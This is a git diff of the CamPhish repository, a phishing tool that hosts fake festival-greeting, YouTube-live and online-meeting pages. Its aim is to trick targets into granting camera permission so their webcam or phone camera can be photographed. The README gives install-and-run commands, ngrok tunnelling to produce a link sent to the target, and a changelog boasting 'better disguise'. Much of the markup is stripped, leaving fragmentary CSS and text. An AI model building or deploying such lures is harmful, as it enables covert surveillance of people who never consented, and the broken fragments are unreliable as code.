diff --git a/LiveYTTV.html b/LiveYTTV.html index dea24dc..be0170c 100644 --- a/LiveYTTV.html +++ b/LiveYTTV.html @@ -1,82 +1,88 @@ + - - - + + + + - - + + - + - + \ No newline at end of file diff --git a/OnlineMeeting.html b/OnlineMeeting.html index c969aac..b719988 100644 --- a/OnlineMeeting.html +++ b/OnlineMeeting.html @@ -2,6 +2,9 @@ + @@ -90,17 +93,18 @@ top: 5px; right: 5px; } + #ac-wrapper { position: fixed; top: 0; left: 0; width: 100%; height: 100%; - background: rgba(255,255,255,.6); + background: rgba(255, 255, 255, .6); z-index: 1001; -} + } -#popup { + #popup { width: 555px; height: 35px; background: #FFFFFF; @@ -112,8 +116,9 @@ -moz-box-shadow: #64686e 0px 0px 3px 3px; -webkit-box-shadow: #64686e 0px 0px 3px 3px; position: relative; - top: 250px; left: 375px; -} + top: 250px; + left: 375px; + } @@ -192,11 +197,11 @@
-
+
diff --git a/README.md b/README.md index 336fd71..3a19380 100644 --- a/README.md +++ b/README.md @@ -1,51 +1,116 @@ -# CamPhish + +# CamPhish + Grab cam shots from target's phone front camera or PC webcam just sending a link. -![CamPhish](https://techchip.net/wp-content/uploads/2020/04/camphish.jpg) -# What is CamPhish? + +

+ + +

+
+ + +# What is CamPhish? +

CamPhish is techniques to take cam shots of target's phone front camera or PC webcam. CamPhish Hosts a fake website on in built PHP server and uses ngrok & serveo to generate a link which we will forward to the target, which can be used on over internet. website asks for camera permission and if the target allows it, this tool grab camshots of target's device

-## Features + + +## Features +

In this tool I added two automatic webpage templates for engaged target on webpage to get more picture of cam

+ +

simply enter festival name or youtube's video ID

-## This Tool Tested On : + + +## This Tool Tested On : + -# Installing and requirements -

This tool require PHP for webserver, SSH or serveo link. First run following command on your terminal

+ + +# Installing and requirements + +

This tool require PHP for webserver, SSH or servo link. First run following command on your terminal

+ + ``` apt-get -y install php openssh git wget ``` + + ## Installing (Kali Linux/Termux): -``` + +```shell git clone https://github.com/techchipnet/CamPhish + cd CamPhish + bash camphish.sh ``` -## Change Log: -

Version: 1.5: Add new online meeting template

+## Login To [ngrok](https://ngrok.com/) + +If You Want To Use CamPhish Now, You Must Login/Signup To get An Private Key. It's Important Because You Have To Provide This Key To CamPhish In Order To Use It. Because Of Ngrok's New Policy , You Can't Get Access To A Custom URL Without Providing The Key. + +So Just Login/Signup, Get The Key An Use CamPhish Without Any Interruption. + + + +## Change Log: + + + +

Version: 1.5: Added new online meeting template, Favicon Support For Better Disguise

+

Version: 1.4: Ngrok authtoken update

-

Version: 1.3: Fix ngrok direct link

-### Video Demo -[![CamPhish Update demo](https://img.youtube.com/vi/i7tvDJx3-yw/0.jpg)](https://www.youtube.com/watch?v=i7tvDJx3-yw) -#### For More Video subcribe TechChip YouTube Channel +

Version: 1.3: Fixed ngrok direct link

+ + + +### Video Demo +

If You Are Facing Any Problem About This tool, You Can consider The Following

+ + +

+ + +

+ + + + +### For More Video subcribe TechChip YouTube Channel +

CamPhish is created to help in penetration testing and it's not responsible for any misuse or illegal purposes.

-

CamPhish is inspired by https://github.com/thelinuxchoice/ Big thanks to @thelinuxchoice

+ +

CamPhish is inspired by https://github.com/thelinuxchoice/ Big thanks to @thelinuxchoice

\ No newline at end of file diff --git a/festivalwishes.html b/festivalwishes.html index 7234e0c..d560554 100644 --- a/festivalwishes.html +++ b/festivalwishes.html @@ -1,692 +1,956 @@ + - - -Happy fes_name to Your Friends - - - - - - - - - - - - - - - - + x); + } - - - -
▅ ▆ ▇ █ HAPPY fes_name █ ▇ ▆ ▅
-
- - - - + h1:nth-child(8) { + transform: translateZ(35px); + } -
-
-
-
-
-
-

- -
-
- -“fes_name का ये शुभ अवसर आपके जीवन में अनेकों ख़ुशियाँ लेकर आए” - -
-
- -इस fes_name हमारी शुभकामनाएँ आपके साथ हैं - -
-
- -|| fes_name की हार्दिक बधाई || - -
-
-

- -
-
-

-

-

-

-

-

-

- -
-
-
- - - - - + h1:nth-child(9) { + transform: translateZ(40px); + } -
-

-

 Wishing you a very

-
-
-

Happy fes_name

-
-

 to you and your lovely family

-
-

 May this auspicious occasion of fes_name bring happiness, prosperity, health, and peace in your life.

-
-

 ✪ I wish that this fes_name is your best one. ✪

-
- -

  यह संदेश fes_name तक सभी के मोबाइल में होना चाहिए यह आपका फर्ज हैं

-
-
-



-
- - - - + h1:nth-child(10) { + transform: translateZ(45px); + } + + + + .rock { + animation: infinite 1s rock + } -
+ @keyframes rock { + 0% { + transform: rotate(-1deg); + } + + 50% { + transform: rotate(2deg); + } + + 100% { + transform: rotate(-1deg); + } + } + + .fuck { + animation: infinite 1s fuck + } + + @keyframes rock { + 0% { + transform: rotate(-2deg); + } + + 50% { + transform: rotate(2deg); + } + + 100% { + transform: rotate(-2deg); + } + } + + + h2 { + font-size: 38px; + text-align: center; + color: #008000; + + animation: rock infinite 1s; + font-family: 'Indie Flower', cursive; + letter-spacing: 2px; + } + + h3 { + font-size: 48px; + text-align: center; + padding: 1px; + margin: 1px; + color: #f06414; + + aanimation: fuck infinite 1s; + font-family: 'Indie Flower', cursive; + letter-spacing: 2px; + + + * { + box-sizing: border-box; + } + + body { + font-family: Verdana, sans-serif; + } + + .mySlides { + display: none; + } + + img { + vertical-align: middle; + } + + /* Slideshow container */ + .slideshow-container { + max-width: 1000px; + position: relative; + margin: auto; + } + + /* Caption text */ + .text { + color: #f2f2f2; + font-size: 15px; + padding: 8px 12px; + position: absolute; + bottom: 8px; + width: 100%; + text-align: center; + } + + /* Number text (1/11 etc) */ + .numbertext { + color: #f2f2f2; + font-size: 12px; + padding: 8px 12px; + position: absolute; + top: 0; + } + + /* The dots/bullets/indicators */ + .dot { + height: 15px; + width: 15px; + margin: 0 2px; + background-color: #bbb; + border-radius: 50%; + display: inline-block; + transition: background-color 0.6s ease; + } + + .active { + background-color: #717171; + } + + /* Fading animation */ + .fade { + -webkit-animation-name: fade; + -webkit-animation-duration: 1.5s; + animation-name: fade; + animation-duration: 1.5s; + } + + @-webkit-keyframes fade { + from { + opacity: .4 + } + + to { + opacity: 1 + } + } + + @keyframes fade { + from { + opacity: .4 + } + + to { + opacity: 1 + } + } + + /* On smaller screens, decrease text size */ + @media only screen and (max-width: 300px) { + .text { + font-size: 11px + } + + } + + .cssload-preloader { + position: absolute; + top: 0px; + left: px; + right: 40px; + bottom: 20px; + z-index: 10; + } + + .cssload-preloader>.cssload-preloader-box { + position: absolute; + height: 16px; + top: 50%; + left: 50%; + margin: -8px 0 0 -82px; + perspective: 110px; + -o-perspective: 110px; + -ms-perspective: 110px; + -webkit-perspective: 110px; + -moz-perspective: 110px; + } + + .cssload-preloader .cssload-preloader-box>div { + position: relative; + width: 16px; + height: 16px; + background: rgb(204, 204, 204); + float: left; + text-align: center; + line-height: 16px; + font-family: Verdana; + font-size: 11px; + color: rgb(255, 255, 255); + } + + .cssload-preloader .cssload-preloader-box>div:nth-child(1) { + background: rgb(255, 0, 0); + margin-right: 8px; + animation: cssload-movement 690ms ease 0ms infinite alternate; + -o-animation: cssload-movement 690ms ease 0ms infinite alternate; + -ms-animation: cssload-movement 690ms ease 0ms infinite alternate; + -webkit-animation: cssload-movement 690ms ease 0ms infinite alternate; + -moz-animation: cssload-movement 690ms ease 0ms infinite alternate; + } + + .cssload-preloader .cssload-preloader-box>div:nth-child(2) { + background: rgb(255, 0, 0); + margin-right: 8px; + animation: cssload-movement 690ms ease 86.25ms infinite alternate; + -o-animation: cssload-movement 690ms ease 86.25ms infinite alternate; + -ms-animation: cssload-movement 690ms ease 86.25ms infinite alternate; + -webkit-animation: cssload-movement 690ms ease 86.25ms infinite alternate; + -moz-animation: cssload-movement 690ms ease 86.25ms infinite alternate; + } + + .cssload-preloader .cssload-preloader-box>div:nth-child(3) { + background: rgb(255, 0, 0); + margin-right: 8px; + animation: cssload-movement 690ms ease 172.5ms infinite alternate; + -o-animation: cssload-movement 690ms ease 172.5ms infinite alternate; + -ms-animation: cssload-movement 690ms ease 172.5ms infinite alternate; + -webkit-animation: cssload-movement 690ms ease 172.5ms infinite alternate; + -moz-animation: cssload-movement 690ms ease 172.5ms infinite alternate; + } + + .cssload-preloader .cssload-preloader-box>div:nth-child(4) { + background: rgb(204, 255, 0); + margin-right: 8px; + animation: cssload-movement 690ms ease 258.75ms infinite alternate; + -o-animation: cssload-movement 690ms ease 258.75ms infinite alternate; + -ms-animation: cssload-movement 690ms ease 258.75ms infinite alternate; + -webkit-animation: cssload-movement 690ms ease 258.75ms infinite alternate; + -moz-animation: cssload-movement 690ms ease 258.75ms infinite alternate; + } + + .cssload-preloader .cssload-preloader-box>div:nth-child(5) { + background: rgb(0, 255, 60); + margin-right: 8px; + animation: cssload-movement 690ms ease 345ms infinite alternate; + -o-animation: cssload-movement 690ms ease 345ms infinite alternate; + -ms-animation: cssload-movement 690ms ease 345ms infinite alternate; + -webkit-animation: cssload-movement 690ms ease 345ms infinite alternate; + -moz-animation: cssload-movement 690ms ease 345ms infinite alternate; + } + + .cssload-preloader .cssload-preloader-box>div:nth-child(6) { + background: rgb(0, 185, 252); + margin-right: 8px; + animation: cssload-movement 690ms ease 431.25ms infinite alternate; + -o-animation: cssload-movement 690ms ease 431.25ms infinite alternate; + -ms-animation: cssload-movement 690ms ease 431.25ms infinite alternate; + -webkit-animation: cssload-movement 690ms ease 431.25ms infinite alternate; + -moz-animation: cssload-movement 690ms ease 431.25ms infinite alternate; + } + + .cssload-preloader .cssload-preloader-box>div:nth-child(7) { + background: rgb(58, 0, 250); + margin-right: 8px; + animation: cssload-movement 690ms ease 517.5ms infinite alternate; + -o-animation: cssload-movement 690ms ease 517.5ms infinite alternate; + -ms-animation: cssload-movement 690ms ease 517.5ms infinite alternate; + -webkit-animation: cssload-movement 690ms ease 517.5ms infinite alternate; + -moz-animation: cssload-movement 690ms ease 517.5ms infinite alternate; + } + + .cssload-preloader .cssload-preloader-box>div:nth-child(8) { + background: rgb(255, 255, 0); + margin-right: 8px; + animation: cssload-movement 690ms ease 603.75ms infinite alternate; + -o-animation: cssload-movement 690ms ease 603.75ms infinite alternate; + -ms-animation: cssload-movement 690ms ease 603.75ms infinite alternate; + -webkit-animation: cssload-movement 690ms ease 603.75ms infinite alternate; + -moz-animation: cssload-movement 690ms ease 603.75ms infinite alternate; + } + + .cssload-preloader .cssload-preloader-box>div:nth-child(9) { + background: rgb(221, 0, 255); + margin-right: 8px; + animation: cssload-movement 690ms ease 690ms infinite alternate; + -o-animation: cssload-movement 690ms ease 690ms infinite alternate; + -ms-animation: cssload-movement 690ms ease 690ms infinite alternate; + -webkit-animation: cssload-movement 690ms ease 690ms infinite alternate; + -moz-animation: cssload-movement 690ms ease 690ms infinite alternate; + } + + .cssload-preloader .cssload-preloader-box>div:nth-child(10) { + background: rgb(51, 102, 255); + margin-right: 8px; + animation: cssload-movement 690ms ease 776.25ms infinite alternate; + -o-animation: cssload-movement 690ms ease 776.25ms infinite alternate; + -ms-animation: cssload-movement 690ms ease 776.25ms infinite alternate; + -webkit-animation: cssload-movement 690ms ease 776.25ms infinite alternate; + -moz-animation: cssload-movement 690ms ease 776.25ms infinite alternate; + } + + + -
+ + + -
- - - - -
- - - Share - - - - Share - -
+ + // Load init + init(); - + + + + + + +
▅ ▆ ▇ █ HAPPY fes_name █ ▇ ▆ ▅
+
+ + + + + +
+
+
+
+
+
+

+ +
+
+ + “fes_name का ये शुभ अवसर आपके जीवन में अनेकों ख़ुशियाँ लेकर आए” + +
+
+ + इस fes_name हमारी शुभकामनाएँ आपके साथ हैं + +
+
+ + || fes_name की हार्दिक बधाई || + +
+
+

+ +
+
+

+ +

+

+ +

+

+ +

+

+ +

+

+ +

+

+ +

+

+ +

+ +
+
+
+ + + + + + +
+

+
+

 Wishing + you a very

+
+
+

Happy fes_name

+
+

 to + you and your lovely family

+
+

 May + this auspicious occasion of fes_name bring happiness, prosperity, health, and peace in your life.

+
+

 ✪ + I wish that this fes_name is your best one. ✪

+
+ +

  + यह संदेश fes_name तक सभी के मोबाइल में होना चाहिए यह आपका फर्ज हैं

+
+
+
+

+

+

+

+

+
+
+ + + + + +
+ + + + + + + + +
+ + + Share + + + + Share + +
+ + + + \ No newline at end of file